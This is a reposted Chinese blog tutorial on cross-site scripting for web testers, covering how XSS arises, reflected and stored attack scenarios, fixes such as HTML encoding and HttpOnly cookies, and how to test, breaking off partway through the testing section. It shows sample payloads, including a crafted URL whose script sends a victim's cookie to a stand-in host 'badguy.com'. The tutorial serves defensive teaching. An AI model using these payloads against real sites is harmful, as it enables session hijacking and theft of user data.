[转载]Web安全测试之XSS跨站脚本攻击与预防
- 3640
- PHP
- 1
- super_dodo
- 2015/11/06
XSS全称(Cross Site Scripting) 跨站脚本攻击,是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的. 比如获取用户的Cookie,导航到恶意网站,携带木马等。
作为测试开发人员,需要了解XSS的原理,攻击场景,如何修复.才能有效的防止XSS的发生。
阅读目录
XSS 是如何发生的 HTML Encode XSS 攻击场景 XSS漏洞的修复 如何测试XSS漏洞 HTML Encode 和URL Encode的区别 浏览器中的XSS过滤器
XSS 是如何发生的呢
假如有下面一个textbox
<input type="text" name="address1" value="value1from"> # value1from是来自用户的输入,如果用户不是输入value1from,而是输入 "/><script>alert(document.cookie)</script><!- 那么就会变成 <input type="text" name="address1" value=""/><script>alert(document.cookie)</script><!- "> # 嵌入的JavaScript代码将会被执行 #或者用户输入的是 "onfocus="alert(document.cookie) 那么就会变成 <input type="text" name="address1" value="" onfocus="alert(document.cookie)"> #事件被触发的时候嵌入的JavaScript代码将会被执行
攻击的威力,取决于用户输入了什么样的脚本
当然用户提交的数据还可以通过QueryString(放在URL中)和Cookie发送给服务器. 例如下图
HTML Encode
XSS之所以会发生,是因为用户输入的数据变成了代码.所以我们需要对用户输入的数据进行HTML Encode处理.将其中的"中括号",“单引号”,“引号” 之类的特殊字符进行编码。
在C#中已经提供了现成的方法,只要调用HttpUtility.HtmlEncode("string
Fiddler中也提供了很方便的工具, 点击Toolbar上的"TextWizard" 按钮
XSS 攻击场景
1. Dom-Based XSS 漏洞 攻击过程如下
Tom 发现了Victim.com中的一个页面有XSS漏洞,
例如: http://victim.com/search.asp?term=apple
服务器中Search.asp 页面的代码大概如下
<html> <title></title> <body> Results for <%Reequest.QueryString("term")%> ... </body> </html>
Tom 先建立一个网站http://badguy.com, 用来接收“偷”来的信息。
然后Tom 构造一个恶意的url(如下), 通过某种方式(邮件,QQ)发给Monica
http://victim.com/search.asp?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>
Monica点击了这个URL,嵌入在URL中的恶意Javascript代码就会在Monica的浏览器中执行. 那么Monica在victim.com网站的cookie, 就会被发送到badguy网站中。这样Monica在victim.com 的信息就被Tom盗了.
2. Stored XSS(存储式XSS漏洞), 该类型是应用广泛而且有可能影响大Web服务器自身安全的漏洞,攻击者将攻击脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄露的可能.攻击过程如下
Alex发现了网站A上有一个XSS 漏洞,该漏洞允许将攻击代码保存在数据库中,
Alex发布了一篇文章,文章中嵌入了恶意JavaScript代码。
其他人如Monica访问这片文章的时候,嵌入在文章中的恶意Javascript代码就会在Monica的浏览器中执行,其会话cookie或者其他信息将被Alex盗走。
Dom-Based XSS漏洞威胁用户个体,而存储式XSS漏洞所威胁的对象将是大量的用户.
XSS 漏洞修复
原则:不相信客户输入的数据 注意: 攻击代码不一定在<script></script>中 将重要的cookie标记为http only,这样的话Javascript 中的document.cookie语句就不能获取到cookie了. 只允许用户输入我们期望的数据.例如:年龄的textbox中,只允许用户输入数字.而数字之外的字符都过滤掉。 对数据进行Html Encode 处理 过滤或移除特殊的Html标签,例如: <script>, <iframe> , < for <, > for >, " for 过滤JavaScript 事件的标签。例如 "onclick=", "onfocus" 等等。
如何测试XSS漏洞
方法一:查看代码,查找关键的变量,客户端将数据传送给Web服务端一般通过三种方式 Querystring, Form表单,以及cookie. 例如在ASP的程序中,通过Request对象获取客户端的变量
<% strUserCode = Request.QueryString(“code”); strUser = Request.Form(“USER”); strID = Request.Cookies(“ID”); %>
假如变量没有经过htmlEncode处理,那么这个变量就存在一个XSS漏洞
方法二:准备测试脚本,
"/>
- CentOS6.5编译安装LNMP环境(nginx-1.7.2, httpd-2.4.9, mysql-5.6.17, php-5.5.12)
- PHP使用Yii2实现Twitter(Api)授权登录并获取信息Demo
- PHP生成导出CSV之内部换行PHP_EOL
- 求MySQL一个SQL语句 不包含某个标签的用户列表
- 第8章 Linux磁盘与文件系统管理–《鸟哥的Linux》
- 2015会不会是微信由盛而衰之年?
- PHP的日期加减计算strtotime Date实现日期加年月日
- Mysql错误代码大全
- PostgreSQL学习手册之–服务器配置
- 要嫁就嫁程序猿—钱多话少死的早(悲催~含着热泪看完了)
相关阅读
- 通过Google API客户端访问Google Play帐户报告PHP库
- PHP执行文件的压缩和解压缩方法
- 消息中间件MQ与RabbitMQ面试题
- 如何搭建一个拖垮公司的技术架构?
- Yii2中ElasticSearch的使用示例
热门文章
- 通过Google API客户端访问Google Play帐户报告PHP库
- PHP执行文件的压缩和解压缩方法
- 消息中间件MQ与RabbitMQ面试题
- 如何搭建一个拖垮公司的技术架构?
- Yii2中ElasticSearch的使用示例
最新文章
- 通过Google API客户端访问Google Play帐户报告PHP库
- PHP执行文件的压缩和解压缩方法
- 消息中间件MQ与RabbitMQ面试题
- 如何搭建一个拖垮公司的技术架构?
- Yii2中ElasticSearch的使用示例